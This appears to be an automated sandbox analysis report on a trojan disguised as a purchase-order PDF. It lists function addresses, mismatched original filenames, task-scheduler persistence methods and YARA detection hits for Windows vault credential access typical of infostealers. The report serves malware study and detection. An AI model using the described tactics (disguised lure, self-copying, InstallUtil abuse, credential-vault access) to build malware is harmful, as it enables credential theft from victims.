Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_05EE8E84 0_2_05EE8E84
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_05EE5390 0_2_05EE5390
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_05EE7A78 0_2_05EE7A78
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_05EEBC08 0_2_05EEBC08
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_05EEBC18 0_2_05EEBC18
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_05EED908 0_2_05EED908
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_05EE5381 0_2_05EE5381
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_05EE1B20 0_2_05EE1B20
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_05EEAA60 0_2_05EEAA60
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_05F20130 0_2_05F20130
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_05F20467 0_2_05F20467
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_05F21748 0_2_05F21748
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_05F5CED8 0_2_05F5CED8
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_05F5C3F0 0_2_05F5C3F0
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_05F53A80 0_2_05F53A80
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_05F5D6E8 0_2_05F5D6E8
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_05F5CEC8 0_2_05F5CEC8
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_05F52190 0_2_05F52190
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_05F52181 0_2_05F52181
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_05F5604B 0_2_05F5604B
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_05F5402D 0_2_05F5402D
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_05F5C3E0 0_2_05F5C3E0
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_05F53A71 0_2_05F53A71
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_061FA648 0_2_061FA648
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_061FA63B 0_2_061FA63B
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_061FAE28 0_2_061FAE28
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_061FAE26 0_2_061FAE26
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_061FE670 0_2_061FE670
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_061FE661 0_2_061FE661
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_061F7718 0_2_061F7718
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_061F7728 0_2_061F7728
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_0621A638 0_2_0621A638
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_06215F08 0_2_06215F08
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_06215303 0_2_06215303
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_0621D1A8 0_2_0621D1A8
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_06215EF8 0_2_06215EF8
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_06210548 0_2_06210548
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_0621A58D 0_2_0621A58D
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_0621D1A3 0_2_0621D1A3
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_0621D199 0_2_0621D199
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_063A0006 0_2_063A0006
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_063A0040 0_2_063A0040
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe Code function: 0_2_063BD1A8 0_2_063BD1A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_02399330 1_2_02399330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_02394A40 1_2_02394A40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_02399BA0 1_2_02399BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_02393E28 1_2_02393E28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_0239CD58 1_2_0239CD58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_02394170 1_2_02394170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_02399AE0 1_2_02399AE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_05B9D450 1_2_05B9D450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_05B99708 1_2_05B99708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_05B926F8 1_2_05B926F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_05B98993 1_2_05B98993
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_05B90040 1_2_05B90040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_05B93B68 1_2_05B93B68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_05B952F8 1_2_05B952F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_05B94C18 1_2_05B94C18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_05B92E60 1_2_05B92E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_05B9B920 1_2_05B9B920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_05CDA198 1_2_05CDA198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_05CDBC48 1_2_05CDBC48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 1_2_0239D102 1_2_0239D102
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_02F02728 2_2_02F02728
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_02F02098 2_2_02F02098
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_02F0207D 2_2_02F0207D
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_06438E84 2_2_06438E84
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_06437A78 2_2_06437A78
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_06435390 2_2_06435390
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_0643BC08 2_2_0643BC08
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_0643BC18 2_2_0643BC18
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_0643AA60 2_2_0643AA60
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_06431B20 2_2_06431B20
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_0643D908 2_2_0643D908
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_064700D0 2_2_064700D0
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_06471748 2_2_06471748
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_06470467 2_2_06470467
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_064A3A80 2_2_064A3A80
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_064AC3F0 2_2_064AC3F0
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_064ACEC8 2_2_064ACEC8
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_064ACED8 2_2_064ACED8
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_064A3A71 2_2_064A3A71
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_064AC3E0 2_2_064AC3E0
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_064A604B 2_2_064A604B
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_064A402A 2_2_064A402A
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_064A2181 2_2_064A2181
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_064A2190 2_2_064A2190
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_06749708 2_2_06749708
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_067496F8 2_2_067496F8
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_06749EE8 2_2_06749EE8
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_06749ED7 2_2_06749ED7
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_0674D730 2_2_0674D730
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_0674D720 2_2_0674D720
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_0676A638 2_2_0676A638
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_06765F08 2_2_06765F08
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_06765303 2_2_06765303
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_0676D1A8 2_2_0676D1A8
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_06765EF8 2_2_06765EF8
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_06760548 2_2_06760548
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_0676C530 2_2_0676C530
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_0676D1A3 2_2_0676D1A3
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_0676D199 2_2_0676D199
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_068F0007 2_2_068F0007
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_068F0040 2_2_068F0040
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 2_2_0690D1A8 2_2_0690D1A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 3_2_00744A48 3_2_00744A48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 3_2_00749AE8 3_2_00749AE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 3_2_0074CD60 3_2_0074CD60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 3_2_00743E30 3_2_00743E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 3_2_00744178 3_2_00744178
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 3_2_058F87A2 3_2_058F87A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 3_2_058F9708 3_2_058F9708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 3_2_058F26F8 3_2_058F26F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 3_2_058F0040 3_2_058F0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 3_2_058FD850 3_2_058FD850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 3_2_058F3B68 3_2_058F3B68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 3_2_058F52F8 3_2_058F52F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 3_2_058F4C18 3_2_058F4C18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 3_2_058F2E4F 3_2_058F2E4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 3_2_058FB920 3_2_058FB920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 3_2_0074D10A 3_2_0074D10A
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_02A82728 7_2_02A82728
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_02A82098 7_2_02A82098
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_02A8207D 7_2_02A8207D
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_05EB5390 7_2_05EB5390
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_05EB8E84 7_2_05EB8E84
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_05EB7A78 7_2_05EB7A78
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_05EB5381 7_2_05EB5381
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_05EBBC08 7_2_05EBBC08
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_05EBBC18 7_2_05EBBC18
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_05EBD908 7_2_05EBD908
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_05EB1B20 7_2_05EB1B20
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_05EBAA60 7_2_05EBAA60
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_05EF0130 7_2_05EF0130
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_05EF0467 7_2_05EF0467
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_05EF1748 7_2_05EF1748
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_05F2CED8 7_2_05F2CED8
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_05F2C3F0 7_2_05F2C3F0
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_05F23A80 7_2_05F23A80
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_05F2CEC8 7_2_05F2CEC8
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_05F22190 7_2_05F22190
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_05F22181 7_2_05F22181
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_05F2604B 7_2_05F2604B
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_05F2402A 7_2_05F2402A
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_05F2C3E0 7_2_05F2C3E0
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_05F23A71 7_2_05F23A71
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_061C9708 7_2_061C9708
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_061CD6D8 7_2_061CD6D8
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_061C9ED7 7_2_061C9ED7
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_061CD6C8 7_2_061CD6C8
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_061C96F8 7_2_061C96F8
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_061C9EE8 7_2_061C9EE8
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_061EA638 7_2_061EA638
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_061E5F08 7_2_061E5F08
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_061E5303 7_2_061E5303
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_061ED1A8 7_2_061ED1A8
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_061E5EF8 7_2_061E5EF8
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_061E0548 7_2_061E0548
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_061EA58D 7_2_061EA58D
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_061ED199 7_2_061ED199
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_061ED1A3 7_2_061ED1A3
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_06370006 7_2_06370006
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_06370040 7_2_06370040
Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Code function: 7_2_0638D1A8 7_2_0638D1A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_02674A48 8_2_02674A48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_02679AE8 8_2_02679AE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_02679BA1 8_2_02679BA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_02673E30 8_2_02673E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_02674178 8_2_02674178
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_0267D118 8_2_0267D118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_026727F4 8_2_026727F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 8_2_0267D112 8_2_0267D112
Sample file is different than original file name gathered from version info
Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1762985351.0000000003CE6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs RFQ__PO_PO 24090041-PDF____PDF.exe
Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1762985351.0000000003CE6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTotlz.exe, vs RFQ__PO_PO 24090041-PDF____PDF.exe
Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1762985351.0000000003CE6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamea7d296ea-7bde-41de-8abb-8da88cb3fc93.exe4 vs RFQ__PO_PO 24090041-PDF____PDF.exe
Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1766602300.00000000062A0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs RFQ__PO_PO 24090041-PDF____PDF.exe
Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1753923605.0000000002F37000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs RFQ__PO_PO 24090041-PDF____PDF.exe
Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1765112405.0000000005DC0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameGrcoosrtoct.dll" vs RFQ__PO_PO 24090041-PDF____PDF.exe
Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1764780727.0000000005D2F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTotlz.exe, vs RFQ__PO_PO 24090041-PDF____PDF.exe
Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1753923605.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamea7d296ea-7bde-41de-8abb-8da88cb3fc93.exe4 vs RFQ__PO_PO 24090041-PDF____PDF.exe
Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1753923605.0000000002C17000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs RFQ__PO_PO 24090041-PDF____PDF.exe
Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1753923605.0000000002C17000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamea7d296ea-7bde-41de-8abb-8da88cb3fc93.exe4 vs RFQ__PO_PO 24090041-PDF____PDF.exe
Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000000.1725389344.00000000006D2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameTotlz.exe, vs RFQ__PO_PO 24090041-PDF____PDF.exe
Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1753113997.0000000000F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs RFQ__PO_PO 24090041-PDF____PDF.exe
Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1762985351.0000000003BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs RFQ__PO_PO 24090041-PDF____PDF.exe
Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1765774518.0000000005F60000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs RFQ__PO_PO 24090041-PDF____PDF.exe
Source: RFQ__PO_PO 24090041-PDF____PDF.exe Binary or memory string: OriginalFilenameTotlz.exe, vs RFQ__PO_PO 24090041-PDF____PDF.exe
Uses 32bit PE files
Source: RFQ__PO_PO 24090041-PDF____PDF.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3eb1aa0.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3eb1aa0.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 2.2.Afoagcjtqvi.exe.4256f68.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 1.2.InstallUtil.exe.600000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 2.2.Afoagcjtqvi.exe.4256f68.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3bd9550.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3d35080.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3ce6860.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3c96840.2.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3c96840.2.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3c96840.2.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3c96840.2.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3c96840.2.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3c96840.2.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3c96840.2.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3c96840.2.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3c96840.2.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3c96840.2.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@9/2@2/2
Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe File created: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: NULL
Source: RFQ__PO_PO 24090041-PDF____PDF.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: RFQ__PO_PO 24090041-PDF____PDF.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
